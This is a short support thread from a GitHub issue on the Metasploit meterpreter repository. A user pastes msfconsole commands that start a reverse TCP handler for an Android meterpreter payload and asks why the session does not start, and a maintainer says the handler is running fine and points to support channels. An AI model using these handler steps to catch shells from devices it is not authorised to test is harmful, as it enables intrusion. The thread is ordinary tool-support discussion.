rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
325 stars 144 forks source link

pleas need help guys !! #202

Closed ramzios25 closed 6 years ago

ramzios25 commented 6 years ago

what i got when i try android payload

msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.6 LHOST => 192.168.1.6 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description


Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description


LHOST 192.168.1.6 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Wildcard Target

msf exploit(handler) > exploit [*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444 msf exploit(handler) >

ps: this what i got the probleme msf exploit(handler) > exploit [*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444 msf exploit(handler) > im using ip internal not with forwarding port

wvu commented 6 years ago

What are you asking?

ramzios25 commented 6 years ago

meterpreter cant start its stop right here msf exploit(handler) > exploit [*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.6:4444

wvu commented 6 years ago

It's running as a background job. It's fine.

wvu commented 6 years ago

We rolled this functionality back. You should update. Also, this is not the right repo for this (support) issue.

wvu commented 6 years ago

If you have a support question, please ask on IRC (https://metasploit.help.rapid7.com/docs/joining-the-metasploit-irc-channel) or Slack (http://r-7.co/metaSlack).